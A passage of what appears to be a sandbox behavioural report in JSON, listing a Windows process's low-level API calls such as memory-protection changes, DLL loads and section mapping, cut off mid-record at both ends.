"name": "OldAccessProtection", "value": "0x00000002", "pretty_value": "PAGE_READONLY" }, { "name": "StackPivoted", "value": "no" } ], "repeated": 0, "id": 273 }, { "timestamp": "2025-03-02 21:32:27,925", "thread_id": "4148", "caller": "0x0040a2a7", "parentcaller": "0x00405871", "category": "process", "api": "NtProtectVirtualMemory", "status": true, "return": "0x00000000", "arguments": [ { "name": "ProcessHandle", "value": "0xffffffff" }, { "name": "BaseAddress", "value": "0x77279000" }, { "name": "ModuleName", "value": "ntdll.dll" }, { "name": "NumberOfBytesProtected", "value": "0x00003000" }, { "name": "MemoryType", "value": "0x00000000" }, { "name": "NewAccessProtection", "value": "0x00000002", "pretty_value": "PAGE_READONLY" }, { "name": "OldAccessProtection", "value": "0x00000004", "pretty_value": "PAGE_READWRITE" }, { "name": "StackPivoted", "value": "no" } ], "repeated": 0, "id": 274 }, { "timestamp": "2025-03-02 21:32:27,925", "thread_id": "4148", "caller": "0x0040a2a7", "parentcaller": "0x00405871", "category": "process", "api": "NtProtectVirtualMemory", "status": true, "return": "0x00000000", "arguments": [ { "name": "ProcessHandle", "value": "0xffffffff" }, { "name": "BaseAddress", "value": "0x743ce000" }, { "name": "ModuleName", "value": "Wldp.dll" }, { "name": "NumberOfBytesProtected", "value": "0x00001000" }, { "name": "MemoryType", "value": "0x00000000" }, { "name": "NewAccessProtection", "value": "0x00000004", "pretty_value": "PAGE_READWRITE" }, { "name": "OldAccessProtection", "value": "0x00000002", "pretty_value": "PAGE_READONLY" }, { "name": "StackPivoted", "value": "no" } ], "repeated": 0, "id": 275 }, { "timestamp": "2025-03-02 21:32:27,925", "thread_id": "4148", "caller": "0x0040a2a7", "parentcaller": "0x00405871", "category": "system", "api": "NtClose", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x00000288" } ], "repeated": 0, "id": 276 }, { "timestamp": "2025-03-02 21:32:27,925", "thread_id": "4148", "caller": "0x0040a2a7", "parentcaller": "0x00405871", "category": "system", "api": "NtClose", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x00000284" } ], "repeated": 0, "id": 277 }, { "timestamp": "2025-03-02 21:32:27,925", "thread_id": "4148", "caller": "0x0040a2a7", "parentcaller": "0x00405871", "category": "process", "api": "NtProtectVirtualMemory", "status": true, "return": "0x00000000", "arguments": [ { "name": "ProcessHandle", "value": "0xffffffff" }, { "name": "BaseAddress", "value": "0x7498a000" }, { "name": "ModuleName", "value": "windows.storage.dll" }, { "name": "NumberOfBytesProtected", "value": "0x00001000" }, { "name": "MemoryType", "value": "0x00000000" }, { "name": "NewAccessProtection", "value": "0x00000002", "pretty_value": "PAGE_READONLY" }, { "name": "OldAccessProtection", "value": "0x00000004", "pretty_value": "PAGE_READWRITE" }, { "name": "StackPivoted", "value": "no" } ], "repeated": 0, "id": 278 }, { "timestamp": "2025-03-02 21:32:27,925", "thread_id": "4148", "caller": "0x0040a2a7", "parentcaller": "0x00405871", "category": "process", "api": "NtSetInformationProcess", "status": true, "return": "0x00000000", "arguments": [ { "name": "ProcessInformationClass", "value": "35" }, { "name": "ProcessInformation", "value": "\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x05\\x00\\x00\\x00\t\\x00\\x00\\x00\\x02\\x00\\x00\\x00\\x00\\x00\\x00\\x00w\\x00s\\x00\\x02\\x00\\x00\\x00\\x00\\x00\\x00\\x00t\\x00e\\x00\\x02\\x00\\x00\\x00\\x00\\x00\\x00\\x00k\\x00e\\x00\\x02\\x00\\x00\\x00\\x00\\x00\\x00\\x003\\x002\\x00\\x02\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x000\\x00" } ], "repeated": 0, "id": 279 }, { "timestamp": "2025-03-02 21:32:27,925", "thread_id": "4148", "caller": "0x0040a2a7", "parentcaller": "0x00405871", "category": "process", "api": "NtProtectVirtualMemory", "status": true, "return": "0x00000000", "arguments": [ { "name": "ProcessHandle", "value": "0xffffffff" }, { "name": "BaseAddress", "value": "0x743ce000" }, { "name": "ModuleName", "value": "Wldp.dll" }, { "name": "NumberOfBytesProtected", "value": "0x00001000" }, { "name": "MemoryType", "value": "0x00000000" }, { "name": "NewAccessProtection", "value": "0x00000002", "pretty_value": "PAGE_READONLY" }, { "name": "OldAccessProtection", "value": "0x00000004", "pretty_value": "PAGE_READWRITE" }, { "name": "StackPivoted", "value": "no" } ], "repeated": 0, "id": 280 }, { "timestamp": "2025-03-02 21:32:27,925", "thread_id": "4148", "caller": "0x0040a2a7", "parentcaller": "0x00405871", "category": "system", "api": "LdrGetDllHandle", "status": false, "return": "0xffffffffc0000135", "pretty_return": "DLL_NOT_FOUND", "arguments": [ { "name": "FileName", "value": "DDRAW.DLL" }, { "name": "ModuleHandle", "value": "0x00000000" } ], "repeated": 1, "id": 281 }, { "timestamp": "2025-03-02 21:32:27,925", "thread_id": "4148", "caller": "0x0040a2a7", "parentcaller": "0x00405871", "category": "system", "api": "LdrGetDllHandle", "status": false, "return": "0xffffffffc0000135", "pretty_return": "DLL_NOT_FOUND", "arguments": [ { "name": "FileName", "value": "D3D8.DLL" }, { "name": "ModuleHandle", "value": "0x00000000" } ], "repeated": 0, "id": 282 }, { "timestamp": "2025-03-02 21:32:27,925", "thread_id": "4148", "caller": "0x0040a2a7", "parentcaller": "0x00405871", "category": "system", "api": "LdrGetDllHandle", "status": false, "return": "0xffffffffc0000135", "pretty_return": "DLL_NOT_FOUND", "arguments": [ { "name": "FileName", "value": "D3D9.DLL" }, { "name": "ModuleHandle", "value": "0x00000000" } ], "repeated": 1, "id": 283 }, { "timestamp": "2025-03-02 21:32:27,925", "thread_id": "4148", "caller": "0x0040a2a7", "parentcaller": "0x00405871", "category": "misc", "api": "RtlDosPathNameToNtPathName_U", "status": true, "return": "0x00000001", "arguments": [ { "name": "DosFileName", "value": "C:\\Windows\\SYSTEM32\\Wldp.dll" } ], "repeated": 0, "id": 284 }, { "timestamp": "2025-03-02 21:32:27,925", "thread_id": "4148", "caller": "0x0040a2a7", "parentcaller": "0x00405871", "category": "filesystem", "api": "NtOpenFile", "status": true, "return": "0x00000000", "arguments": [ { "name": "FileHandle", "value": "0x00000284" }, { "name": "DesiredAccess", "value": "0x00020000", "pretty_value": "READ_CONTROL" }, { "name": "FileName", "value": "C:\\Windows\\System32\\wldp.dll" }, { "name": "ShareAccess", "value": "5", "pretty_value": "FILE_SHARE_READ|FILE_SHARE_DELETE" } ], "repeated": 0, "id": 285 }, { "timestamp": "2025-03-02 21:32:27,925", "thread_id": "4148", "caller": "0x0040a2a7", "parentcaller": "0x00405871", "category": "system", "api": "NtClose", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x00000284" } ], "repeated": 0, "id": 286 }, { "timestamp": "2025-03-02 21:32:27,925", "thread_id": "4148", "caller": "0x0040a2a7", "parentcaller": "0x00405871", "category": "system", "api": "DllLoadNotification", "status": true, "return": "0x00000000", "arguments": [ { "name": "NotificationReason", "value": "load" }, { "name": "DllName", "value": "C:\\Windows\\SYSTEM32\\Wldp" }, { "name": "DllBase", "value": "0x743b0000" } ], "repeated": 0, "id": 287 }, { "timestamp": "2025-03-02 21:32:27,925", "thread_id": "4148", "caller": "0x0040a2a7", "parentcaller": "0x00405871", "category": "system", "api": "LdrGetDllHandle", "status": false, "return": "0xffffffffc0000135", "pretty_return": "DLL_NOT_FOUND", "arguments": [ { "name": "FileName", "value": "DDRAW.DLL" }, { "name": "ModuleHandle", "value": "0x00000000" } ], "repeated": 1, "id": 288 }, { "timestamp": "2025-03-02 21:32:27,925", "thread_id": "4148", "caller": "0x0040a2a7", "parentcaller": "0x00405871", "category": "system", "api": "LdrGetDllHandle", "status": false, "return": "0xffffffffc0000135", "pretty_return": "DLL_NOT_FOUND", "arguments": [ { "name": "FileName", "value": "D3D8.DLL" }, { "name": "ModuleHandle", "value": "0x00000000" } ], "repeated": 0, "id": 289 }, { "timestamp": "2025-03-02 21:32:27,925", "thread_id": "4148", "caller": "0x0040a2a7", "parentcaller": "0x00405871", "category": "system", "api": "LdrGetDllHandle", "status": false, "return": "0xffffffffc0000135", "pretty_return": "DLL_NOT_FOUND", "arguments": [ { "name": "FileName", "value": "D3D9.DLL" }, { "name": "ModuleHandle", "value": "0x00000000" } ], "repeated": 1, "id": 290 }, { "timestamp": "2025-03-02 21:32:27,925", "thread_id": "4148", "caller": "0x0040a2a7", "parentcaller": "0x00405871", "category": "misc", "api": "RtlDosPathNameToNtPathName_U", "status": true, "return": "0x00000001", "arguments": [ { "name": "DosFileName", "value": "C:\\Windows\\SYSTEM32\\windows.storage.dll" } ], "repeated": 0, "id": 291 }, { "timestamp": "2025-03-02 21:32:27,925", "thread_id": "4148", "caller": "0x0040a2a7", "parentcaller": "0x00405871", "category": "filesystem", "api": "NtOpenFile", "status": true, "return": "0x00000000", "arguments": [ { "name": "FileHandle", "value": "0x00000284" }, { "name": "DesiredAccess", "value": "0x00020000", "pretty_value": "READ_CONTROL" }, { "name": "FileName", "value": "C:\\Windows\\System32\\windows.storage.dll" }, { "name": "ShareAccess", "value": "5", "pretty_value": "FILE_SHARE_READ|FILE_SHARE_DELETE" } ], "repeated": 0, "id": 292 }, { "timestamp": "2025-03-02 21:32:27,925", "thread_id": "4148", "caller": "0x0040a2a7", "parentcaller": "0x00405871", "category": "system", "api": "NtClose", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x00000284" } ], "repeated": 0, "id": 293 }, { "timestamp": "2025-03-02 21:32:27,925", "thread_id": "4148", "caller": "0x0040a2a7", "parentcaller": "0x00405871", "category": "system", "api": "DllLoadNotification", "status": true, "return": "0x00000000", "arguments": [ { "name": "NotificationReason", "value": "load" }, { "name": "DllName", "value": "C:\\Windows\\SYSTEM32\\windows.storage" }, { "name": "DllBase", "value": "0x743e0000" } ], "repeated": 0, "id": 294 }, { "timestamp": "2025-03-02 21:32:27,925", "thread_id": "4148", "caller": "0x0040a2a7", "parentcaller": "0x00405871", "category": "process", "api": "NtAllocateVirtualMemory", "status": true, "return": "0x00000000", "arguments": [ { "name": "ProcessHandle", "value": "0xffffffff" }, { "name": "BaseAddress", "value": "0x0049b000" }, { "name": "RegionSize", "value": "0x00003000" }, { "name": "Protection", "value": "0x00000004", "pretty_value": "PAGE_READWRITE" }, { "name": "StackPivoted", "value": "no" } ], "repeated": 0, "id": 295 }, { "timestamp": "2025-03-02 21:32:27,925", "thread_id": "4148", "caller": "0x0040a2a7", "parentcaller": "0x00405871", "category": "system", "api": "LdrGetDllHandle", "status": true, "return": "0x00000000", "arguments": [ { "name": "FileName", "value": "api-ms-win-eventing-provider-l1-1-0.dll" }, { "name": "ModuleHandle", "value": "0x763d0000" } ], "repeated": 0, "id": 296 }, { "timestamp": "2025-03-02 21:32:27,925", "thread_id": "4148", "caller": "0x0040a2a7", "parentcaller": "0x00405871", "category": "system", "api": "LdrGetProcedureAddressForCaller", "status": true, "return": "0x00000000", "arguments": [ { "name": "ModuleName", "value": "KERNELBASE.dll" }, { "name": "ModuleHandle", "value": "0x763d0000" }, { "name": "FunctionName", "value": "EventSetInformation" }, { "name": "Ordinal", "value": "0" }, { "name": "FunctionAddress", "value": "0x77180b80" } ], "repeated": 0, "id": 297 }, { "timestamp": "2025-03-02 21:32:27,925", "thread_id": "4148", "caller": "0x0040a2a7", "parentcaller": "0x00405871", "category": "system", "api": "LdrpCallInitRoutine", "status": true, "return": "0x00000001", "arguments": [ { "name": "MappedPath", "value": "\\Device\\HarddiskVolume2\\Windows\\SysWOW64\\wldp" }, { "name": "BaseAddress", "value": "0x743b0000" }, { "name": "InitRoutine", "value": "0x743b9170" }, { "name": "Reason", "value": "1" } ], "repeated": 0, "id": 298 }, { "timestamp": "2025-03-02 21:32:27,925", "thread_id": "4148", "caller": "0x0040a2a7", "parentcaller": "0x00405871", "category": "system", "api": "LdrGetDllHandle", "status": true, "return": "0x00000000", "arguments": [ { "name": "FileName", "value": "api-ms-win-core-synch-l1-2-0.dll" }, { "name": "ModuleHandle", "value": "0x763d0000" } ], "repeated": 0, "id": 299 }, { "timestamp": "2025-03-02 21:32:27,925", "thread_id": "4148", "caller": "0x0040a2a7", "parentcaller": "0x00405871", "category": "system", "api": "LdrGetProcedureAddressForCaller", "status": true, "return": "0x00000000", "arguments": [ { "name": "ModuleName", "value": "KERNELBASE.dll" }, { "name": "ModuleHandle", "value": "0x763d0000" }, { "name": "FunctionName", "value": "InitializeConditionVariable" }, { "name": "Ordinal", "value": "0" }, { "name": "FunctionAddress", "value": "0x771b5560" } ], "repeated": 0, "id": 300 }, { "timestamp": "2025-03-02 21:32:27,925", "thread_id": "4148", "caller": "0x0040a2a7", "parentcaller": "0x00405871", "category": "system", "api": "LdrGetProcedureAddressForCaller", "status": true, "return": "0x00000000", "arguments": [ { "name": "ModuleName", "value": "KERNELBASE.dll" }, { "name": "ModuleHandle", "value": "0x763d0000" }, { "name": "FunctionName", "value": "SleepConditionVariableCS" }, { "name": "Ordinal", "value": "0" }, { "name": "FunctionAddress", "value": "0x765acd00" } ], "repeated": 0, "id": 301 }, { "timestamp": "2025-03-02 21:32:27,925", "thread_id": "4148", "caller": "0x0040a2a7", "parentcaller": "0x00405871", "category": "system", "api": "LdrGetProcedureAddressForCaller", "status": true, "return": "0x00000000", "arguments": [ { "name": "ModuleName", "value": "KERNELBASE.dll" }, { "name": "ModuleHandle", "value": "0x763d0000" }, { "name": "FunctionName", "value": "WakeAllConditionVariable" }, { "name": "Ordinal", "value": "0" }, { "name": "FunctionAddress", "value": "0x771bacc0" } ], "repeated": 0, "id": 302 }, { "timestamp": "2025-03-02 21:32:27,925", "thread_id": "4148", "caller": "0x0040a2a7", "parentcaller": "0x00405871", "category": "process", "api": "NtProtectVirtualMemory", "status": true, "return": "0x00000000", "arguments": [ { "name": "ProcessHandle", "value": "0xffffffff" }, { "name": "BaseAddress", "value": "0x74990000" }, { "name": "ModuleName", "value": "windows.storage.dll" }, { "name": "NumberOfBytesProtected", "value": "0x00001000" }, { "name": "MemoryType", "value": "0x00000000" }, { "name": "NewAccessProtection", "value": "0x00000004", "pretty_value": "PAGE_READWRITE" }, { "name": "OldAccessProtection", "value": "0x00000002", "pretty_value": "PAGE_READONLY" }, { "name": "StackPivoted", "value": "no" } ], "repeated": 0, "id": 303 }, { "timestamp": "2025-03-02 21:32:27,925", "thread_id": "4148", "caller": "0x0040a2a7", "parentcaller": "0x00405871", "category": "process", "api": "NtProtectVirtualMemory", "status": true, "return": "0x00000000", "arguments": [ { "name": "ProcessHandle", "value": "0xffffffff" }, { "name": "BaseAddress", "value": "0x74990000" }, { "name": "ModuleName", "value": "windows.storage.dll" }, { "name": "NumberOfBytesProtected", "value": "0x00001000" }, { "name": "MemoryType", "value": "0x00000000" }, { "name": "NewAccessProtection", "value": "0x00000002", "pretty_value": "PAGE_READONLY" }, { "name": "OldAccessProtection", "value": "0x00000004", "pretty_value": "PAGE_READWRITE" }, { "name": "StackPivoted", "value": "no" } ], "repeated": 0, "id": 304 }, { "timestamp": "2025-03-02 21:32:27,925", "thread_id": "4148", "caller": "0x0040a2a7", "parentcaller": "0x00405871", "category": "system", "api": "LdrGetDllHandle", "status": true, "return": "0x00000000", "arguments": [ { "name": "FileName", "value": "ntdll.dll" }, { "name": "ModuleHandle", "value": "0x77150000" } ], "repeated": 0, "id": 305 }, { "timestamp": "2025-03-02 21:32:27,925", "thread_id": "4148", "caller": "0x0040a2a7", "parentcaller": "0x00405871", "category": "system", "api": "LdrGetProcedureAddressForCaller", "status": true, "return": "0x00000000", "arguments": [ { "name": "ModuleName", "value": "ntdll.dll" }, { "name": "ModuleHandle", "value": "0x77150000" }, { "name": "FunctionName", "value": "RtlDllShutdownInProgress" }, { "name": "Ordinal", "value": "0" }, { "name": "FunctionAddress", "value": "0x771afa60" } ], "repeated": 0, "id": 306 }, { "timestamp": "2025-03-02 21:32:27,925", "thread_id": "4148", "caller": "0x0040a2a7", "parentcaller": "0x00405871", "category": "system", "api": "LdrpCallInitRoutine", "status": true, "return": "0x00000001", "arguments": [ { "name": "MappedPath", "value": "\\Device\\HarddiskVolume2\\Windows\\SysWOW64\\windows.storage" }, { "name": "BaseAddress", "value": "0x743e0000" }, { "name": "InitRoutine", "value": "0x745bd1f0" }, { "name": "Reason", "value": "1" } ], "repeated": 0, "id": 307 }, { "timestamp": "2025-03-02 21:32:27,925", "thread_id": "4148", "caller": "0x0040a2a7", "parentcaller": "0x00405871", "category": "process", "api": "NtProtectVirtualMemory", "status": true, "return": "0x00000000", "arguments": [ { "name": "ProcessHandle", "value": "0xffffffff" }, { "name": "BaseAddress", "value": "0x761b9000" }, { "name": "ModuleName", "value": "shell32.dll" }, { "name": "NumberOfBytesProtected", "value": "0x00001000" }, { "name": "MemoryType", "value": "0x00000000" }, { "name": "NewAccessProtection", "value": "0x00000004", "pretty_value": "PAGE_READWRITE" }, { "name": "OldAccessProtection", "value": "0x00000002", "pretty_value": "PAGE_READONLY" }, { "name": "StackPivoted", "value": "no" } ], "repeated": 0, "id": 308 }, { "timestamp": "2025-03-02 21:32:27,925", "thread_id": "4148", "caller": "0x0040a2a7", "parentcaller": "0x00405871", "category": "process", "api": "NtProtectVirtualMemory", "status": true, "return": "0x00000000", "arguments": [ { "name": "ProcessHandle", "value": "0xffffffff" }, { "name": "BaseAddress", "value": "0x761b9000" }, { "name": "ModuleName", "value": "shell32.dll" }, { "name": "NumberOfBytesProtected", "value": "0x00001000" }, { "name": "MemoryType", "value": "0x00000000" }, { "name": "NewAccessProtection", "value": "0x00000002", "pretty_value": "PAGE_READONLY" }, { "name": "OldAccessProtection", "value": "0x00000004", "pretty_value": "PAGE_READWRITE" }, { "name": "StackPivoted", "value": "no" } ], "repeated": 0, "id": 309 }, { "timestamp": "2025-03-02 21:32:27,925", "thread_id": "4148", "caller": "0x00409093", "parentcaller": "0x0040a2a7", "category": "process", "api": "NtOpenSection", "status": true, "return": "0x00000000", "arguments": [ { "name": "SectionHandle", "value": "0x000002b8" }, { "name": "DesiredAccess", "value": "0x0000000d" }, { "name": "ObjectAttributes", "value": "SHCORE.dll" } ], "repeated": 0, "id": 310 }, { "timestamp": "2025-03-02 21:32:27,925", "thread_id": "4148", "caller": "0x00409093", "parentcaller": "0x0040a2a7", "category": "process", "api": "NtMapViewOfSection", "status": true, "return": "0x00000000", "arguments": [ { "name": "SectionHandle", "value": "0x000002b8" }, { "name": "ProcessHandle", "value": "0xffffffff" }, { "name": "BaseAddress", "value": "0x75bb0000" }, { "name": "SectionOffset", "value": "0x00000000" }, { "name": "ViewSize", "value": "0x00087000" }, { "name": "Win32Protect", "value": "0x00000080", "pretty_value": "PAGE_EXECUTE_WRITECOPY" }, { "name": "StackPivoted", "value": "no" } ], "repeated": 0, "id": 311 }, { "timestamp": "2025-03-02 21:32:27,925", "thread_id": "4148", "caller": "0x00409093", "parentcaller": "0x0040a2a7", "category": "process", "api": "NtProtectVirtualMemory", "status": true, "return": "0x00000000", "arguments": [ { "name": "ProcessHandle", "value": "0xffffffff" }, { "name": "BaseAddress", "value": "0x75c2c000" }, { "name": "ModuleName", "value": "SHCORE.dll" }, { "name": "NumberOfBytesProtected", "value": "0x00001000" }, { "name": "MemoryType", "value": "0x00000000" }, { "name": "NewAccessProtection", "value": "0x00000002", "pretty_value": "PAGE_READONLY" }, { "name": "OldAccessProtection", "value": "0x00000004", "pretty_value": "PAGE_READWRITE" }, { "name": "StackPivoted", "value": "no" } ], "repeated": 0, "id": 312 }, { "timestamp": "2025-03-02 21:32:27,925", "thread_id": "4148", "caller": "0x00409093", "parentcaller": "0x0040a2a7", "category": "process", "api": "NtProtectVirtualMemory", "status": true, "return": "0x00000000", "arguments": [ { "name": "ProcessHandle", "value": "0xffffffff" }, { "name": "BaseAddress", "value": "0x77279000" }, { "name": "ModuleName", "value": "ntdll.dll" }, { "name": "NumberOfBytesProtected", "value": "0x00003000" }, { "name": "MemoryType", "value": "0x00000000" }, { "name": "NewAccessProtection", "value": "0x00000004", "pretty_value": "PAGE_READWRITE" }, { "name": "OldAccessProtection", "value": "0x00000002", "pretty_value": "PAGE_READONLY" }, { "name": "StackPivoted", "value": "no" } ], "repeated": 0, "id": 313 }, { "timestamp": "2025-03-02 21:32:27,925", "thread_id": "4148", "caller": "0x00409093", "parentcaller": "0x0040a2a7", "category": "process", "api": "NtProtectVirtualMemory", "status": true, "return": "0x00000000", "arguments": [ { "name": "ProcessHandle", "value": "0xffffffff" }, { "name": "BaseAddress", "value": "0x77279000" }, { "name": "ModuleName", "value": "ntdll.dll" }, { "name": "NumberOfBytesProtected", "value": "0x00003000" }, { "name": "MemoryType", "value": "0x00000000" }, { "name": "NewAccessProtection", "value": "0x00000002", "pretty_value": "PAGE_READONLY" }, { "name": "OldAccessProtection", "value": "0x00000004", "pretty_value": "PAGE_READWRITE" }, { "name": "StackPivoted", "value": "no" } ], "repeated": 0, "id": 314 }, { "timestamp": "2025-03-02 21:32:27,925", "thread_id": "4148", "caller": "0x00409093", "parentcaller": "0x0040a2a7", "category": "process", "api": "NtProtectVirtualMemory", "status": true, "return": "0x00000000", "arguments": [ { "name": "ProcessHandle", "value": "0xffffffff" }, { "name": "BaseAddress", "value": "0x75c29000" }, { "name": "ModuleName", "value": "SHCORE.dll" }, { "name": "NumberOfBytesProtected", "value": "0x00001000" }, { "name": "MemoryType", "value": "0x00000000" }, { "name": "NewAccessProtection", "value": "0x00000004", "pretty_value": "PAGE_READWRITE" }, { "name": "OldAccessProtection", "value": "0x00000002", "pretty_value": "PAGE_READONLY" }, { "name": "StackPivoted", "value": "no" } ], "repeated": 0, "id": 315 }, { "timestamp": "2025-03-02 21:32:27,925", "thread_id": "4148", "caller": "0x00409093", "parentcaller": "0x0040a2a7", "category": "system", "api": "NtClose", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x000002b8" } ], "repeated": 0, "id": 316 }, { "timestamp": "2025-03-02 21:32:27,925", "thread_id": "4148", "caller": "0x00409093", "parentcaller": "0x0040a2a7", "category": "process", "api": "NtProtectVirtualMemory", "status": true, "return": "0x00000000", "arguments": [ { "name": "ProcessHandle", "value": "0xffffffff" }, { "name": "BaseAddress", "value": "0x75c29000" }, { "name": "ModuleName", "value": "SHCORE.dll" }, { "name": "NumberOfBytesProtected", "value": "0x00001000" }, { "name": "MemoryType", "value": "0x00000000" }, { "name": "NewAccessProtection", "value": "0x00000002", "pretty_value": "PAGE_READONLY" }, { "name": "OldAccessProtection", "value": "0x00000004", "pretty_value": "PAGE_READWRITE" }, { "name": "StackPivoted", "value": "no" } ], "repeated": 0, "id": 317 }, { "timestamp": "2025-03-02 21:32:27,925", "thread_id": "4148", "caller": "0x00409093", "parentcaller": "0x0040a2a7", "category": "process", "api": "NtSetInformationProcess", "status": true, "return": "0x00000000", "arguments": [ { "name": "ProcessInformationClass", "value": "35" }, { "name": "ProcessInformation", "value": "\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x05\\x00\\x00\\x00\n\\x00\\x00\\x00\\x02\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\\\x00p\\x00\\x02\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\\\x00A\\x00\\x02\\x00\\x00\\x00\\x00\\x00\\x00\\x00t\\x00a\\x00\\x02\\x00\\x00\\x00\\x00\\x00\\x00\\x00a\\x00l\\x00\\x02\\x00\\x00\\x00\\x00\\x00\\x00\\x00p\\x00\\x00\\x00" } ], "repeated": 0, "id": 318 }, { "timestamp": "2025-03-02 21:32:27,925", "thread_id": "4148", "caller": "0x00409093", "parentcaller": "0x0040a2a7", "category": "system", "api": "LdrGetDllHandle", "status": false, "return": "0xffffffffc0000135", "pretty_return": "DLL_NOT_FOUND", "arguments": [ { "name": "FileName", "value": "DDRAW.DLL" }, { "name": "ModuleHandle", "value": "0x00000000" } ], "repeated": 1, "id": 319 }, { "timestamp": "2025-03-02 21:32:27,925", "thread_id": "4148", "caller": "0x00409093", "parentcaller": "0x0040a2a7", "category": "system", "api": "LdrGetDllHandle", "status": false, "return": "0xffffffffc0000135", "pretty_return": "DLL_NOT_FOUND", "arguments": [ { "name": "FileName", "value": "D3D8.DLL" }, { "name": "ModuleHandle", "value": "0x00000000" } ], "repeated": 0, "id": 320 }, { "timestamp": "2025-03-02 21:32:27,925", "thread_id": "4148", "caller": "0x00409093", "parentcaller": "0x0040a2a7", "category": "system", "api": "LdrGetDllHandle", "status": false, "return": "0xffffffffc0000135", "pretty_return": "DLL_NOT_FOUND", "arguments": [ { "name": "FileName", "value": "D3D9.DLL" }, { "name": "ModuleHandle", "value": "0x00000000" } ], "repeated": 1, "id": 321 }, { "timestamp": "2025-03-02 21:32:27,925", "thread_id": "4148", "caller": "0x00409093", "parentcaller": "0x0040a2a7", "category": "misc", "api": "RtlDosPathNameToNtPathName_U", "status": true, "return": "0x00000001", "arguments": [ { "name": "DosFileName", "value": "C:\\Windows\\System32\\SHCORE.dll" } ], "repeated": 0, "id": 322 }, { "timestamp": "2025-03-02 21:32:27,940", "thread_id": "4148", "caller": "0x00409093", "parentcaller": "0x0040a2a7", "category": "filesystem", "api": "NtOpenFile", "status": true, "return": "0x00000000", "arguments": [ { "name": "FileHandle", "value": "0x000002b8" }, { "name": "DesiredAccess", "value": "0x00020000", "pretty_value": "READ_CONTROL" }, { "name": "FileName", "value": "C:\\Windows\\System32\\SHCore.dll" }, { "name": "ShareAccess", "value": "5", "pretty_value": "FILE_SHARE_READ|FILE_SHARE_DELETE" } ], "repeated": 0, "id": 323 }, { "timestamp": "2025-03-02 21:32:27,940", "thread_id": "4148", "caller": "0x00409093", "parentcaller": "0x0040a2a7", "category": "system", "api": "NtClose", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x000002b8" } ], "repeated": 0, "id": 324 }, { "timestamp": "2025-03-02 21:32:27,940", "thread_id": "4148", "caller": "0x00409093", "parentcaller": "0x0040a2a7", "category": "system", "api": "DllLoadNotification", "status": true, "return": "0x00000000", "arguments": [ { "name": "NotificationReason", "value": "load" }, { "name": "DllName", "value": "C:\\Windows\\System32\\SHCORE" }, { "name": "DllBase", "value": "0x75bb0000" } ], "repeated": 0, "id": 325 }, { "timestamp": "2025-03-02 21:32:28,003", "thread_id": "4148", "caller": "0x00409093", "parentcaller": "0x0040a2a7", "category": "system", "api": "LdrpCallInitRoutine", "status": true, "return": "0x00000001", "arguments": [ { "name": "MappedPath", "value": "\\Device\\HarddiskVolume2\\Windows\\SysWOW64\\SHCore" }, { "name": "BaseAddress", "value": "0x75bb0000" }, { "name": "InitRoutine", "value": "0x75bf2170" }, { "name": "Reason", "value": "1" } ], "repeated": 0, "id": 326 }, { "timestamp": "2025-03-02 21:32:28,003", "thread_id": "4148", "caller": "0x00409093", "parentcaller": "0x0040a2a7", "category": "process", "api": "NtProtectVirtualMemory", "status": true, "return": "0x00000000", "arguments": [ { "name": "ProcessHandle", "value": "0xffffffff" }, { "name": "BaseAddress", "value": "0x74990000" }, { "name": "ModuleName", "value": "windows.storage.dll" }, { "name": "NumberOfBytesProtected", "value": "0x00001000" }, { "name": "MemoryType", "value": "0x00000000" }, { "name": "NewAccessProtection", "value": "0x00000004", "pretty_value": "PAGE_READWRITE" }, { "name": "OldAccessProtection", "value": "0x00000002", "pretty_value": "PAGE_READONLY" }, { "name": "StackPivoted", "value": "no" } ], "repeated": 0, "id": 327 }, { "timestamp": "2025-03-02 21:32:28,003", "thread_id": "4148", "caller": "0x00409093", "parentcaller": "0x0040a2a7", "category": "process", "api": "NtProtectVirtualMemory", "status": true, "return": "0x00000000", "arguments": [ { "name": "ProcessHandle", "value": "0xffffffff" }, { "name": "BaseAddress", "value": "0x74990000" }, { "name": "ModuleName", "value": "windows.storage.dll" }, { "name": "NumberOfBytesProtected", "value": "0x00001000" }, { "name": "MemoryType", "value": "0x00000000" }, { "name": "NewAccessProtection", "value": "0x00000002", "pretty_value": "PAGE_READONLY" }, { "name": "OldAccessProtection", "value": "0x00000004", "pretty_value": "PAGE_READWRITE" }, { "name": "StackPivoted", "value": "no" } ], "repeated": 0, "id": 328 }, { "timestamp": "2025-03-02 21:32:28,003", "thread_id": "4148", "caller": "0x00409093", "parentcaller": "0x0040a2a7", "category": "process", "api": "NtOpenSection", "status": true, "return": "0x00000000", "arguments": [ { "name": "SectionHandle", "value": "0x000002bc" }, { "name": "DesiredAccess", "value": "0x00000006" }, { "name": "ObjectAttributes", "value": "windows_shell_global_counters" } ], "repeated": 0, "id": 329 }, { "timestamp": "2025-03-02 21:32:28,003", "thread_id": "4148", "caller": "0x00409093", "parentcaller": "0x0040a2a7", "category": "process", "api": "NtMapViewOfSection", "status": true, "return": "0x00000000", "arguments": [ { "name": "SectionHandle", "value": "0x000002bc" }, { "name": "ProcessHandle", "value": "0xffffffff" }, { "name": "BaseAddress", "value": "0x04920000" }, { "name": "SectionOffset", "value": "0x00191bf4" }, { "name": "ViewSize", "value": "0x00001000" }, { "name": "Win32Protect", "value": "0x00000004", "pretty_value": "PAGE_READWRITE" }, { "name": "StackPivoted", "value": "no" } ], "repeated": 0, "id": 330 }, { "timestamp": "2025-03-02 21:32:28,003", "thread_id": "4148", "caller": "0x00409093", "parentcaller": "0x0040a2a7", "category": "process", "api": "NtOpenProcessToken", "status": true, "return": "0x00000000", "arguments": [ { "name": "ProcessHandle", "value": "0xffffffff" }, { "name": "DesiredAccess", "value": "0x00000008" }, { "name": "TokenHandle", "value": "0x000002c0" } ], "repeated": 0, "id": 331 }, { "timestamp": "2025-03-02 21:32:28,003", "thread_id": "4148", "caller": "0x00409093", "parentcaller": "0x0040a2a7", "category": "process", "api": "NtQueryInformationToken", "status": true, "return": "0x00000000", "arguments": 